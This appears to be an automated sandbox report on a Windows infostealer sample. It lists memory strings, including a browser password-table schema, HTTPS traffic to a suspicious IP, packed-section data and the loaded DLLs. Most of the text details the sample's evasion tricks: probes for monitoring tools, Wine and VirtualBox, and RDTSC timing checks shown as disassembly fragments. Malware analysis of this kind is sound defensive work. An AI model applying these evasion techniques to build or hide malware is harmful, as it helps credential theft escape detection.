                Source: AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: AaEBZ7icLd.exe, 00000000.00000003.2251961304.000000000593E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: AaEBZ7icLd.exe, 00000000.00000003.2251961304.000000000593E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: AaEBZ7icLd.exe, 00000000.00000003.2251961304.000000000593E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: AaEBZ7icLd.exe, 00000000.00000003.2251961304.000000000593E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: AaEBZ7icLd.exe, 00000000.00000003.2251961304.000000000593E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: AaEBZ7icLd.exe, 00000000.00000003.2251961304.000000000593E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49736 version: TLS 1.2

                System Summary

                barindex
                PE file contains section with special chars
                Source: AaEBZ7icLd.exeStatic PE information: section name:
                Source: AaEBZ7icLd.exeStatic PE information: section name: .idata
                Source: AaEBZ7icLd.exeStatic PE information: section name:
                Source: AaEBZ7icLd.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: AaEBZ7icLd.exeStatic PE information: Section: ZLIB complexity 0.9995787377450981
                Source: AaEBZ7icLd.exeStatic PE information: Section: nyylnyuw ZLIB complexity 0.9946991614941669
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: AaEBZ7icLd.exe, 00000000.00000003.2198757587.0000000005837000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2224159738.0000000005837000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198630257.0000000005841000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: AaEBZ7icLd.exeVirustotal: Detection: 56%
                Source: AaEBZ7icLd.exeReversingLabs: Detection: 57%
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile read: C:\Users\user\Desktop\AaEBZ7icLd.exeJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: AaEBZ7icLd.exeStatic file information: File size 1883648 > 1048576
                Source: AaEBZ7icLd.exeStatic PE information: Raw size of nyylnyuw is bigger than: 0x100000 < 0x1a1e00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeUnpacked PE file: 0.2.AaEBZ7icLd.exe.3e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nyylnyuw:EW;dppqrxbg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nyylnyuw:EW;dppqrxbg:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: AaEBZ7icLd.exeStatic PE information: real checksum: 0x1cf69b should be: 0x1cdf4e
                Source: AaEBZ7icLd.exeStatic PE information: section name:
                Source: AaEBZ7icLd.exeStatic PE information: section name: .idata
                Source: AaEBZ7icLd.exeStatic PE information: section name:
                Source: AaEBZ7icLd.exeStatic PE information: section name: nyylnyuw
                Source: AaEBZ7icLd.exeStatic PE information: section name: dppqrxbg
                Source: AaEBZ7icLd.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeCode function: 0_3_01084CE8 push es; retn 0042h0_3_01084EE9
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeCode function: 0_3_01084CE8 push es; retn 0042h0_3_01084EE9
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeCode function: 0_3_01084CE8 push es; retn 0042h0_3_01084EE9
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeCode function: 0_3_01084CE8 push es; retn 0042h0_3_01084EE9
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeCode function: 0_3_01084CE8 push es; retn 0042h0_3_01084EE9
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeCode function: 0_3_01084CE8 push es; retn 0042h0_3_01084EE9
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeCode function: 0_3_01084CE8 push es; retn 0042h0_3_01084EE9
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeCode function: 0_3_01084CE8 push es; retn 0042h0_3_01084EE9
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeCode function: 0_3_01084CE8 push es; retn 0042h0_3_01084EE9
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeCode function: 0_3_01084CE8 push es; retn 0042h0_3_01084EE9
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeCode function: 0_3_01084CE8 push es; retn 0042h0_3_01084EE9
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeCode function: 0_3_01084CE8 push es; retn 0042h0_3_01084EE9
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeCode function: 0_3_01084CE8 push es; retn 0042h0_3_01084EE9
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeCode function: 0_3_01084CE8 push es; retn 0042h0_3_01084EE9
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeCode function: 0_3_01084CE8 push es; retn 0042h0_3_01084EE9
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeCode function: 0_3_01084CE8 push es; retn 0042h0_3_01084EE9
                Source: AaEBZ7icLd.exeStatic PE information: section name: entropy: 7.983643456292964
                Source: AaEBZ7icLd.exeStatic PE information: section name: nyylnyuw entropy: 7.9545802741870855

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5B8AE8 second address: 5B8AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5B8AF1 second address: 5B8B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F909C7BD317h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5B8C7F second address: 5B8C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5B8C88 second address: 5B8C8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5B8DC4 second address: 5B8DD3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F909CBB3516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5B8F4D second address: 5B8F7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD312h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F909C7BD313h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5B8F7B second address: 5B8F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F909CBB351Ah 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5B9219 second address: 5B922D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F909C7BD308h 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F909C7BD306h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5BC2B3 second address: 5BC2C4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F909CBB3518h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5BC2C4 second address: 5BC2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5BC2D3 second address: 5BC2D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5BC2D7 second address: 5BC2DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5BC2DB second address: 5BC2EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5BC2EA second address: 5BC2F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5BC3CA second address: 5BC3D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5BC4A3 second address: 5BC4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F909C7BD306h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d je 00007F909C7BD314h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5BC4B9 second address: 5BC4BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5BC4BF second address: 5BC523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov esi, dword ptr [ebp+122D197Fh] 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F909C7BD308h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov ecx, dword ptr [ebp+122D3450h] 0x0000002e call 00007F909C7BD309h 0x00000033 jns 00007F909C7BD31Dh 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jno 00007F909C7BD308h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5BC523 second address: 5BC5A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F909CBB351Fh 0x00000011 mov eax, dword ptr [eax] 0x00000013 jnl 00007F909CBB351Ah 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e pushad 0x0000001f jc 00007F909CBB3516h 0x00000025 push ecx 0x00000026 pop ecx 0x00000027 popad 0x00000028 jg 00007F909CBB351Ch 0x0000002e popad 0x0000002f pop eax 0x00000030 pushad 0x00000031 or ebx, 44605CF4h 0x00000037 adc dh, FFFFFF9Ah 0x0000003a popad 0x0000003b push 00000003h 0x0000003d mov dword ptr [ebp+122D19DFh], ecx 0x00000043 or dword ptr [ebp+122D2E0Ch], esi 0x00000049 push 00000000h 0x0000004b push ecx 0x0000004c mov edi, ecx 0x0000004e pop edi 0x0000004f push 00000003h 0x00000051 mov ecx, dword ptr [ebp+122D2DE9h] 0x00000057 call 00007F909CBB3519h 0x0000005c push eax 0x0000005d push edx 0x0000005e jl 00007F909CBB3518h 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5BC5A1 second address: 5BC644 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F909C7BD308h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jmp 00007F909C7BD315h 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e jmp 00007F909C7BD30Eh 0x00000023 mov eax, dword ptr [eax] 0x00000025 je 00007F909C7BD31Eh 0x0000002b jc 00007F909C7BD318h 0x00000031 jmp 00007F909C7BD312h 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a jmp 00007F909C7BD318h 0x0000003f pop eax 0x00000040 jmp 00007F909C7BD319h 0x00000045 lea ebx, dword ptr [ebp+1245717Bh] 0x0000004b or di, 9D15h 0x00000050 push eax 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5BC644 second address: 5BC64D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5BC783 second address: 5BC7D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F909C7BD30Eh 0x0000000b pop edi 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jnl 00007F909C7BD30Ch 0x00000017 mov eax, dword ptr [eax] 0x00000019 jo 00007F909C7BD318h 0x0000001f jmp 00007F909C7BD312h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b jnp 00007F909C7BD306h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5DAA78 second address: 5DAA7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5DAA7C second address: 5DAA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5DABF6 second address: 5DABFB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5DABFB second address: 5DAC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jmp 00007F909C7BD30Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5DAE74 second address: 5DAEA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB3527h 0x00000007 jbe 00007F909CBB351Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 ja 00007F909CBB351Eh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5DB16F second address: 5DB173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5DB173 second address: 5DB19F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F909CBB3516h 0x00000008 jmp 00007F909CBB3522h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F909CBB3520h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5DB5CA second address: 5DB5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F909C7BD313h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5DBE68 second address: 5DBE94 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F909CBB3535h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5DC134 second address: 5DC138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5DC138 second address: 5DC13E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5DC13E second address: 5DC15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F909C7BD308h 0x0000000c popad 0x0000000d push eax 0x0000000e push esi 0x0000000f jbe 00007F909C7BD306h 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5DC15B second address: 5DC161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5DC2A7 second address: 5DC2AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5DC2AB second address: 5DC2B4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5DC2B4 second address: 5DC2BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
